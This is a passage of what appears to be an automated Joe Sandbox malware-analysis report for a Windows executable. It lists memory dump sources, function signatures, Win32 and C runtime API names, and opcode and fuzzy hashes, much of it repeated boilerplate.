                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                          • Instruction ID: 3686ea3b89d5565f0ba5473675d9919a64f87501eb3d06a5f12a299c8a14c6e6
                          • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                          • Instruction Fuzzy Hash: AD81E332F59E5285F750AB69AC406BEE6B0BB46BA4FC14135CD0E53699DF3CA409E320
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2398171386-0
                          • Opcode ID: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                          • Instruction ID: bccdaebd527ca212548bfef2be1a4e604e3d8583b4f07996e2b041a6b215589c
                          • Opcode Fuzzy Hash: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
                          • Instruction Fuzzy Hash: 3B51B162B14E4289FB50AF65FC402BEA372AB84BB8F904639DE1D466D8DE38945D9310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                          • String ID:
                          • API String ID: 3659116390-0
                          • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                          • Instruction ID: 5618e543839d9be2d8943b19bddba6d1b0604f396e76d7c6f20bed9d4bff581d
                          • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                          • Instruction Fuzzy Hash: 7E51E332B15A5185F710DB29E8403AEBB70FB557A8F848136CE4E57A98DF38D059D720
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocString
                          • String ID:
                          • API String ID: 262959230-0
                          • Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                          • Instruction ID: 1f9a804eb36abde1d69e0884e38a81cbbb5099ff033e26bbe90c847363d3f276
                          • Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                          • Instruction Fuzzy Hash: 1441F731B09E4585F754AF36AC5127AA290EF04BB5F844634EA2D47BD5EF3CD04A9320
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID:
                          • API String ID: 190572456-0
                          • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                          • Instruction ID: f7820b3016d5ff166bb0560ddcda2443f21309a731890a3b5ef38fa51d42c8a6
                          • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                          • Instruction Fuzzy Hash: 0D41B371B09E4285FA15AB1ABD08576A295BB84BF0F898535DD1D4B788EF3CE448E320
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                          • Instruction ID: 3d643498e1001f5d6b4b3f1054363e002d3aa4ad7aa26e2642d3fb2282ee81e4
                          • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                          • Instruction Fuzzy Hash: 65116036E18E0781F654312DFD4137BD561AF573B0EC88234EA7D865DE9E2CA4486125
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Message$DispatchObjectPeekSingleTranslateWait
                          • String ID:
                          • API String ID: 3621893840-0
                          • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                          • Instruction ID: 3b9776867922abf17fff9ee7f49d3d6557a497d6a1b754c211ab23a401d8609c
                          • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                          • Instruction Fuzzy Hash: 0EF04F22B2894682F750A725FC95A37A261FFA4B25FC41030E94F468949E2CD54DE720
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: __except_validate_context_recordabort
                          • String ID: csm$csm
                          • API String ID: 746414643-3733052814
                          • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                          • Instruction ID: 878fac4435d841b32e51af2390ba4416490d894c194a7d924919e4ac1157e193
                          • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                          • Instruction Fuzzy Hash: E471E872608AA1C6EB609F21E85077EFBA0EB00BE8F448535DE4C07689DF3CD499D790
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: $*
                          • API String ID: 3215553584-3982473090
                          • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                          • Instruction ID: 29dd61ea3cd62dfc9dc488dc3f0e4f6d019fb2388ab0bc5fddf8782b0bd3bba8
                          • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                          • Instruction Fuzzy Hash: 1151AB7290CE428AF7E4AE38A84477EB7A0FB05B28F951135CE4943199EF38D449E625
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$StringType
                          • String ID: $%s
                          • API String ID: 3586891840-3791308623
                          • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                          • Instruction ID: ead5a4595c148a2a23216ff15a3e94ff297596613b77917b26db7160dba866a5
                          • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                          • Instruction Fuzzy Hash: 59419532B14F8149FB619F29EC012AAA2A1FB55BB9F884635DE1D477C8DF3CE4499310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CreateFrameInfo__except_validate_context_recordabort
                          • String ID: csm
                          • API String ID: 2466640111-1018135373
                          • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                          • Instruction ID: 5fe4de63569317d22e500c0765999f87678b97edaedc876d020aec09b3f4e813
                          • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                          • Instruction Fuzzy Hash: DC519F36619B52C7E620AB25F84026FB7A4FB89BA0F800535DB8C07B55EF38E054DB50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ByteCharErrorFileLastMultiWideWrite
                          • String ID: U
                          • API String ID: 2456169464-4171548499
                          • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                          • Instruction ID: 5904a38fff702a26e39c9c8efc61b8a75b0140bf5144debdaeaadb73b6f1c423
                          • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                          • Instruction Fuzzy Hash: EC41C222719A8182E750DF29F8043BAE760FB897A4F854031EE4D87B58DF7CD449D710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ObjectRelease
                          • String ID:
                          • API String ID: 1429681911-3916222277
                          • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                          • Instruction ID: 7e3e7306fabc894495e90501dd47e56cbc03e29a0c2ceb923fa5dca3bb579f01
                          • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                          • Instruction Fuzzy Hash: 0A313C35708B4286EA04AF12BC1866BB7A1F789FE5F904435ED4A47B64CE3CD849DB10
                          APIs
                          • InitializeCriticalSection.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8BB
                          • CreateSemaphoreW.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8CB
                          • CreateEventW.KERNEL32(?,?,?,00007FF71613317F,?,?,00001000,00007FF71611E51D), ref: 00007FF71612E8E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                          • String ID: Thread pool initialization failed.
                          • API String ID: 3340455307-2182114853
                          • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                          • Instruction ID: 3e704ce3c42bf59e7401fffcadc82120fd26c3864fe34d36bcbeae118ace1607
                          • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                          • Instruction Fuzzy Hash: 1E212E72E15E4186F7409F24F8443AE72A2FB94B1CF548034CA0C4A284DF7E9859D7A0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CapsDeviceRelease
                          • String ID:
                          • API String ID: 127614599-3916222277
                          • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                          • Instruction ID: 72ae2d255a31a5c0cedc34b18192978f7da5001d8836475ae241c94c88422ee6
                          • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                          • Instruction Fuzzy Hash: B5E0C220B08A4282FB0877B6B98903BA2A1EB4CBE0F558035DA1F87794CE3CC8C84310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
